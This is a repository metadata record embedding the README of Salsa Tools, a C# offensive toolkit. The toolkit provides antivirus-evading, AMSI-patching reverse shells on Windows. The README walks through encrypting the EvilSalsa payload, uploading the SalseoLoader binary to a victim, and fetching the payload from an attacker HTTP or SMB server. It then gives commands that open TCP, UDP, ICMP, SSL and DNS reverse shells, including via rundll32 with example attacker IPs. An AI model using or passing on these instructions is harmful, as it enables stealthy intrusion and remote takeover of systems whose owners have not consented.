{"id":13539535,"url":"https://github.com/hackplayers/salsa-tools","last_synced_at":"2025-04-02T06:31:05.970Z","repository":{"id":45456740,"uuid":"169153043","full_name":"Hackplayers/Salsa-tools","owner":"Hackplayers","description":"Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY and AV bypass, AMSI patched","archived":false,"fork":false,"pushed_at":"2020-01-31T22:41:35.000Z","size":8568,"stargazers_count":578,"open_issues_count":0,"forks_count":130,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-11-03T04:32:38.028Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackplayers.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-02-04T21:31:28.000Z","updated_at":"2024-11-01T08:39:49.000Z","dependencies_parsed_at":"2022-07-14T13:00:50.999Z","dependency_job_id":null,"html_url":"https://github.com/Hackplayers/Salsa-tools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackplayers","download_url":"https://codeload.github.com/Hackplayers/Salsa-tools/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767759,"owners_count":20830550,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:27.359Z","updated_at":"2025-04-02T06:31:00.961Z","avatar_url":"https://github.com/Hackplayers.png","language":"C#","funding_links":[],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"b1161d6c4cb520d0cd574347cd18342e\"\u003e\u003c/a\u003e免杀\u0026\u0026躲避AV检测"],"readme":"![License](https://img.shields.io/badge/license-GNU-green.svg?style=flat-square)\n\n```\n   _____       __              ______            __    \n  / ___/____ _/ /________ _   /_  __/___  ____  / /____\n  \\__ \\/ __ `/ / ___/ __ `/    / / / __ \\/ __ \\/ / ___/\n ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) \n/____/\\__,_/_/____/\\__,_/    /_/  \\____/\\____/_/____/  \n\n```\n# Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce  \n\nSalsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it's execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took place during h-c0n in 9th February 2019.\n\n\n## Features\n    * TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     \n    * AV Safe (17th February)\n    * AMSI patchers\n    * PowerShell execution \n    * ...\n    \n## Overview\nSalsa-Tools is made from three different  ingredients:\n    - EvilSalsa\n    - EncrypterAssembly\n    - SalseoLoader\nAnd his behavior is as it follows:\n\n\n\n## Setup\n### Requirements\n - Visual Studio 2017 (or similar)\n \t- Microsoft.PowerShell.3.ReferenceAssemblies dependencies compiling in .NET 4.0\n\t- Microsoft.PowerShell.2.ReferenceAssemblies dependencies compiling in .NET 3.5\n - Python 2.7       \n### Running la Salsa\n#### Cooking EvilSalsa\n\n```\n   ___ __ __  ____  _            \n  /  _]  |  ||    || |           \n /  [_|  |  | |  | | |           \n|    _]  |  | |  | | |___        \n|   [_|  :  | |  | |     |       \n|     |\\   /  |  | |     |       \n|_____| \\_/  |____||_____|       \n                                 \n  _____  ____  _     _____  ____ \n / ___/ /    || |   / ___/ /    |\n(   \\_ |  o  || |  (   \\_ |  o  |\n \\__  ||     || |___\\__  ||     |\n /  \\ ||  _  ||     /  \\ ||  _  |\n \\    ||  |  ||     \\    ||  |  |\n  \\___||__|__||_____|\\___||__|__|\n  \n[+] That is our Payload\n                                 \n```\n\nEvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as it follows: as soon as the payloads starts, it runs `System.Management.Automation.dll` which creates a runspace . Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). Once EvilSalsa is loaded, first thing first, the existence of `c:\\windows\\system32\\amsi.dll` is checked. If it exists, it is patched using a home-cooked variant of CyberArk and Rastamouse bypasses.\n\n\n#### Mixing EncrypterAssembly and Evilsalsa\n```\n  ______                             _            \n |  ____|                           | |           \n | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ \n |  __| | '_ \\ / __| '__| | | | '_ \\| __/ _ \\ '__|\n | |____| | | | (__| |  | |_| | |_) | ||  __/ |   \n |______|_| |_|\\___|_|   \\__, | .__/ \\__\\___|_|   \n     /\\                   __/ | || |   | |        \n    /  \\   ___ ___  ___ _|___/|_|| |__ | |_   _   \n   / /\\ \\ / __/ __|/ _ \\ '_ ` _ \\| '_ \\| | | | |  \n  / ____ \\\\__ \\__ \\  __/ | | | | | |_) | | |_| |  \n /_/    \\_\\___/___/\\___|_| |_| |_|_.__/|_|\\__, |  \n                                           __/ |  \n                                          |___/   \n\t\t\t  \n [+] Software that encrypts the payload using RC4\n [+] We have the version in python and the version in .exe\n```\n\nEncrypterAssembly can be used as a Python script or as a Exe binary.\nIt encrypts the previously generated EvilSalsa.\n\nPython usage:\n```\npython encrypterassembly.py \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT\u003e\n```\nExecutable usage:\n```\nEncrypterassembly.exe \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT\u003e\n```\n#### Bringing the Encrypted EvilSalsa to the table with SalseoLoader\nSalseoLoader is in charge of loading the encrypted payload. Can be both compiled as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor \"main\" must be exported. Arguments are added using environmental variables.\n\n```\n  _____  ____  _     _____   ___   ___\n / ___/ /    || |   / ___/  /  _] /   \\\n(   \\_ |  o  || |  (   \\_  /  [_ |     |\n \\__  ||     || |___\\__  ||    _]|  O  |\n /  \\ ||  _  ||     /  \\ ||   [_ |     |\n \\    ||  |  ||     \\    ||     ||     |\n  \\___||__|__||_____|\\___||_____| \\___/\n\n _       ___    ____  ___      ___  ____\n| |     /   \\  /    ||   \\    /  _]|    \\\n| |    |     ||  o  ||    \\  /  [_ |  D  )\n| |___ |  O  ||     ||  D  ||    _]|    /\n|     ||     ||  _  ||     ||   [_ |    \\\n|     ||     ||  |  ||     ||     ||  .  \\\n|_____| \\___/ |__|__||_____||_____||__|\\_|\n\n                             By: CyberVaca@HackPlayers\n\n[+] Usage:\n\n    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT\n    [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT\n    [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST\n    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS\n    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT\n    [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseSSL LHOST LPORT\n    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode\n    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C\n\n[+] Available Payloads:\n\n    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode\n    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity\n```\n\n# Tutorial\n\n## Compiling the binaries\n\nDownload the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.\n\n\nCompile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).\n\n\nYou can **select the architecture** inside Visual Studio in the **left \"Build\" Tab in \"Platform Target\"**.\n\n(If you can't find this options press in \"**Project Tab**\" and then in \"**\u003cProject-Name\u003e Properties**\")\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen1.png)\n\nThen, build both projects (Build -\u003e Build Solution) (Inside the logs will appear the path of the executable):\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen2.png)\n\n## Prepare the Backdoor\n\nFirst of all, you will need to encode the **EvilSalsa.dll**. To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**\n\n### Python\n```bash\npython EncrypterAssembly/encrypterassembly.py \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT_FILE\u003e\npython EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt\n```\n\n### Windows\n```\nEncrypterAssembly.exe \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT_FILE\u003e\nEncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt\n```\n\nOk, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader**.\n**Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...**\n\n## Execute the backdoor\n\n### Getting a TCP reverse shell (downloading encoded dll through HTTP)\n\nRemember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.\n\n`SalseoLoader.exe password http://\u003cAttacker-IP\u003e/evilsalsa.dll.txt reversetcp \u003cAttacker-IP\u003e \u003cPort\u003e`\n\n### Getting a UDP reverse shell (downloading encoded dll through SMB)\n\nRemember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).\n\n`SalseoLoader.exe password \\\\\u003cAttacker-IP\u003e/folder/evilsalsa.dll.txt reverseudp \u003cAttacker-IP\u003e \u003cPort\u003e`\n\n### Getting a TCP reverse shell SSL (using local file)\n\n**Set the listener inside the attacker machine:**\n\n```\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -key key.pem -cert cert.pem -port \u003cport\u003e -tls1\n```\n**Execute the backdoor:**\n```\nSalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL \u003cAttacker-IP\u003e \u003cPort\u003e\n```\n\n### Getting a ICMP reverse shell (encoded dll already inside the victim)\n\n**This time you need a special tool in the client to receive the reverse shell. Download:  [https://github.com/inquisb/icmpsh]**\n\n**Disable ICMP Replies:**\n```sysctl -w net.ipv4.icmp_echo_ignore_all=1\n\n#You finish, you can enable it again running:\nsysctl -w net.ipv4.icmp_echo_ignore_all=0\n```\n\n**Execute the client:**\n\n`python icmpsh_m.py \"\u003cAttacker-IP\u003e\" \"\u003cVictm-IP\u003e\"`\n\n**Inside the victim, lets execute the salseo thing:**\n\n`SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp \u003cAttacker-IP\u003e`\n\n\n## Compiling SalseoLoader as DLL exporting main function\n\nOpen the SalseoLoader project using Visual Studio.\n\n## Add before the main function: \\[DllExport\\]\n\nBefore the main function add this line: \\[DllExport\\]\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen3.png)\n\n### Install DllExport for this project\n\n**Tools --\u003e NuGet Package Manager --\u003e Manage NuGet Packages for Solution...**\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen4.png)\n\n**Search for DllExport package (using Browse tab), and press Install (and accept the popup)**\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen5.png)\n\nIn your project folder have appeared the files: **DllExport.bat** and **DllExport_Configure.bat**\n\n### Uninstall DllExport\n\nPress **Uninstall** (yeah, its weird but trust me, it is necessary)\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen6.png)\n\n### Exit Visual Studio and execute DllExport_configure\n\nJust **exit** Visual Studio\n\nThen, go to your **SalseoLoader folder** and **execute DllExport_Configure.bat**\nSelect **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen7.png)\n\n### Open the project again with visual Studio\n**\\[DllExport\\]** should not be longer marked as error\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen8.png)\n\n### Build the solution\nSelect **Output Type = Class Library** (Project --\u003e SalseoLoader Properties --\u003e Application --\u003e Output type = Class Library)\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen9.png)\n\nSelect **x64 platform** (Project --\u003e SalseoLoader Properties --\u003e Build --\u003e Platform target = x64)\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen10.png)\n\nTo **build** the solution: Build --\u003e Build Solution (Inside the Output console the path of the new DLL will appear)\n\n### Test the generated Dll\n\nCopy and paste the Dll where you want to test it.\n\nExecute:\n\n`rundll32.exe SalseoLoader.dll,main`\n\nIf not error appears, probably you have a functional dll!!\n\n## Get a shell using the Dll\n\nDon't forget to use a **HTTP server and set a nc listener**\n\n### Powershell\n\n```\n$env:pass=\"password\"\n$env:payload=\"http://10.2.0.5/evilsalsax64.dll.txt\"\n$env:lhost=\"10.2.0.5\"\n$env:lport=\"1337\"\n$env:shell=\"reversetcp\"\nrundll32.exe SalseoLoader.dll,main\n```\n\n### CMD\n\n```\nset pass=password\nset payload=http://10.2.0.5/evilsalsax64.dll.txt\nset lhost=10.2.0.5\nset lport=1337\nset shell=reversetcp\nrundll32.exe SalseoLoader.dll,main\n```\n\nDocumented by https://github.com/carlospolop-forks/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackplayers%2Fsalsa-tools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackplayers%2Fsalsa-tools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackplayers%2Fsalsa-tools/lists"}